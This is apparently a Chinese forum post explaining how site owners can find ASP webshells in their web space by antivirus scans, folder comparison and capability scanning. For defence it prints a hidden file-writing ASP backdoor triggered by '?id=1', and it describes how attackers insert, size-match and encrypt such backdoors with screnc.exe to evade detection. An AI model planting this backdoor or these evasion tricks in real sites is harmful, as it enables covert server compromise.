TA的每日心情 | 开心 2014-7-28 21:47 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
6 H; @8 m O# c5 S% Q2 s" Z- T9 ^1 M# j
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
( T6 b2 ], y8 s0 _0 l
& R9 \1 E+ s6 J5 S( q一.技巧1:杀毒软件查杀 3 U0 c% L! ]( V; Z2 I# H5 d" k. P
: j; f6 I. {9 E: |; L6 |一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
- |, [4 H7 r: u0 K
+ D' }! a/ Y8 \6 @2 x8 ~# w+ J利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
9 v! S c5 f! t/ c; q* W( S+ ]0 H d* @$ O: J$ I
二.技巧2:FTP客户端对比
- `; a4 n& ^$ D% d' Q x/ ^
/ m( K9 p1 Y3 z- G$ b$ R# p上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 9 M# W" {4 X4 Z
4 K' ~- K4 Y- K; x% }screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 / r8 N! ]' L6 V4 J2 _
8 h4 ~1 v' F* l7 C @
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
- |3 h" r, d- X( ] |. S$ r* }
7 J. L. u" k* S) N+ g' J# r9 w等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 , ]" j% z" j7 c- J& b8 M
/ p! ?' x2 S8 s) @2 q盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
# w' h& |9 b3 H6 x3 Y* Y [3 i! C8 F6 Q' @, s% Y ]0 Y1 a
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
: f: {7 H8 {+ X, E
0 ~4 _1 Q0 `# E. d这里以FlashFXP进行操作讲解。 $ p% j R3 M- Z4 r
+ s' S0 I& S9 |7 P. E, l
步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 9 z7 r4 {! h2 S
! C v" S, k1 ^) _6 z' Z. Y( _, t+ k
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 $ ~8 q" \8 T9 A0 q; F/ K
: O4 }; g; p4 s+ n2 F
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
; j" o2 i2 X2 v' c# l三.技巧3:用Beyond Compare 2进行对比 - m) I: c1 @! N- T
1 g, s4 o1 K3 B; q) e
上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
7 w5 M7 I% s, B2 k+ g# V
4 W" a9 V9 `0 F2 ]〈%
! v0 z2 p- {% r! }! a1 ^ A
; d4 I) ^* I; f/ \ {1 c9 Ton error resume next
" ^( p5 u* j; G! A& h5 k6 T' e( [* b/ N# S- _5 w. W
id=request("id")
/ g1 V4 N+ r: b
# i1 ?# t" r+ J4 Y9 `if request("id")=1 then 8 Z* ?) d3 b' l
+ S6 d/ q- R* L2 x( Mtestfile=Request.form("name")
9 n5 y3 c D- j5 L8 H' o9 A! w- h2 R U" K( p& q, h
msg=Request.form("message")
8 `+ B3 v- q$ U/ V4 [$ l% w$ @. l8 c( c/ {2 {
set fs=server.CreatObject("scripting.filesystemobject") ) r2 d; k4 ]1 o/ G; o3 h
3 ^( g) I. ^4 S8 ]
set thisfile=fs.openTestFile(testfile,8,True,0) 5 u2 }! y- S$ A. t# X: q5 i
, r, M' k H b5 p) P8 Ythisfile.Writeline(""&msg&"") & k, `' ]- p6 z! q) `
$ p- h. B1 e2 n6 V+ J$ D$ A' a u: P) _
thisfile.close
" e, y p' p4 I. ]2 V& b
, h( E; F: D$ uset fs=nothing
3 z6 A" v o5 K9 x7 D. m) c, _: ~" J
%〉 6 e- }( C7 T1 V4 G: \5 @' v: `
4 S/ K, G4 }0 u
〈from method="post" Action="保存"?id=1〉 3 j) f1 u. k# E5 l8 j
" L$ B7 E3 |% b, O" B5 l- O
〈input type="text" size="20" name="Name"
/ P6 J. T! W; p- e) q/ F" B2 X+ L. C/ T& t2 d4 `# R4 Y2 F
Value=〈%=server.mappath("XP.ASP")%〉〉
7 X& j! s- `- D* L ^ F* @6 `% w
5 ~' i/ T3 L1 \- ?〈textarea name="Message" class=input〉 E4 i% y$ h5 L$ E
, F, ]0 S# A# e+ l0 [1 E) c
' F; I( s, z) q' ^4 ~4 P) t〈/textarea〉 , x8 w- s, y4 P5 u
/ V# U8 L# Y$ S5 r% R) a6 d4 a5 R) {〈input type="Submit" name="send" Value="生成" 2 p7 g5 t! m/ m2 j9 |. \ @) a
/ T0 l: ]! D# b; `, t% M5 ^class=input〉 7 R- c# B9 O/ E- z
7 u: P0 W! y, B, q! ^, x; h& x0 t〈/from〉
4 K) r& ^2 p( B1 z8 t6 @, e, v* @' h9 \; s
〈%end if%〉
9 V. o2 P) |9 j, b! O; d0 p7 e! a7 U4 ^& _# } z7 [/ a
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
2 C& m9 q5 n$ x& Q/ D/ T8 {3 ?1 f# K0 D, h
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
% M- @: R0 g. l) K: g
- N# M/ {# m, O! R2 I- ]% k; @这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 0 B6 W- ?& J9 n, D7 I2 G
5 A6 |8 n4 w/ X' T3 F' sBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。3 w; y; k5 n+ b5 w2 X
: U N$ R9 I* O! l# _" N
看我来利用它完成渗透性asp木马的查找。 P, l0 F5 l6 _0 D5 Y6 j
: T/ t2 B: V1 @% g* _步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 1 N; i3 Y" @# d" e5 H+ w
6 o2 Y& l0 Z& s/ P4 s) F
步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
9 ~$ ^% e, K. H" W+ Y/ U! E; Y( D& p4 L
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
3 T8 b+ z# u5 [/ r: N% g$ r( i" H* H
8 ~3 K; y) ]; S, I8 B t& P, W8 g* k f& L( N8 u; s& b
四.技巧4:利用组件性能找asp木马
8 |; j. v3 M Y3 Y6 K5 q
) P0 O( x' H( F6 B上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
, D: d- j# H& Q. o( Z8 P- K
' Z- D3 c& x6 c4 z+ n如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 : X6 E7 r5 L' C/ L3 P8 k
2 Q9 N- k9 y; d7 W
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。
4 J6 k+ T# n6 R
% P5 S; r9 V; w/ T使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
, B u# \/ v& \0 b
9 |. K2 k" }: I1 a5 \9 w* ~( d一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 + `7 v+ e1 x5 V3 t% J( q# ~
) @+ l6 K0 @, U' B% X& M大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|